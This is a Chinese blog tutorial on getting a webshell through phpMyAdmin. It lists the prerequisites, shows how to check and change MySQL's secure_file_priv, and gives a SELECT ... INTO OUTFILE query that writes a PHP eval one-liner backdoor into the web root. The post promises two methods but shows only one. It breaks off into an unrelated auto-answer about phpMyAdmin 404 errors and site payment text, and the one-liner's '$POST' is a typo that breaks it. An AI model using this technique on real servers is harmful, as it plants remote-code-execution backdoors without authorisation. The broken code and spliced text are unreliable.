phpmyadmin页面getshell

0x00 前言

来到phpmyadmin页面后如何getshell呢?下面介绍两种方法

0x01 select into outfile直接写入

1、利用条件

  • 对web目录需要有写权限能够使用单引号(root)

  • 知道网站绝对路径(phpinfo/php探针/通过报错等)

  • secure_file_priv没有具体值

2、查看secure_file_priv值

show global variables like '%secure%';

关于secure_file_priv配置介绍:

secure_file_priv 是用来限制 load dumpfile、into outfile、load_file() 函数在哪个目录下拥有上传或者读取文件的权限

当 secure_file_priv 的值为 NULL ,表示限制 mysqld 不允许导入|导出,此时无法提权
当 secure_file_priv 的值为 /tmp/ ,表示限制 mysqld 的导入|导出只能发生在 /tmp/ 目录下,此时也无法提权
当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制,此时可提权

我这里的secure_file_priv值为NULL,所以不能够导入或导出

secure_file_priv这个值是只读变量,只能通过配置文件修改。如果管理员没有配置,那么我们是无法进行写入shell的,这里我为了测试能否写入修改一下

在MySQL的配置文件my.ini中进行配置:

修改后secure_file_priv的值如图所示:

3、写入一句话

select '<?php @eval($POST[1]); ?>' INTO OUTFILE 'D:\\phpStudy\\PHPTutorial\\WWW\\a.php'

这里需要注意的一个点是路径需要用"\\"

查看下根目录

  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
如果您在安装PhpMyAdmin工具后访问页面时出现404错误,可能是由于Apache2不认识/var/www/phpmyadmin路径导致的。您提到的参考资料中也提到了这一点。 要解决这个问题,您可以检查以下几点: 1. 确保您已经正确安装了PhpMyAdmin,并且已经将其放置在/var/www/phpmyadmin路径下。您可以通过运行命令sudo apt-get install phpmyadmin来安装PhpMyAdmin。 2. 检查您的Apache2配置文件是否正确。您可以根据参考资料中的指南来进行Apache2配置目录的分析,确保配置文件中正确指定了PhpMyAdmin的路径。请注意,配置文件的位置可能因操作系统和版本而异,通常可以在/etc/apache2/目录下找到。 3. 确保您的Apache2服务器已经重新启动。在更改配置文件后,您需要重新启动Apache2服务器使更改生效。您可以使用命令sudo service apache2 restart来重新启动Apache2。 如果您按照上述步骤检查并且仍然遇到404错误,请确保您的操作系统、软件版本和配置与参考资料中提到的环境一致。如果问题仍然存在,您可能需要进一步检查日志文件以获取更多信息,并尝试其他的解决方法。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [安装LAMP+phpmyadmin 遇到404错误](https://blog.csdn.net/Lionel_Coder/article/details/117489004)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值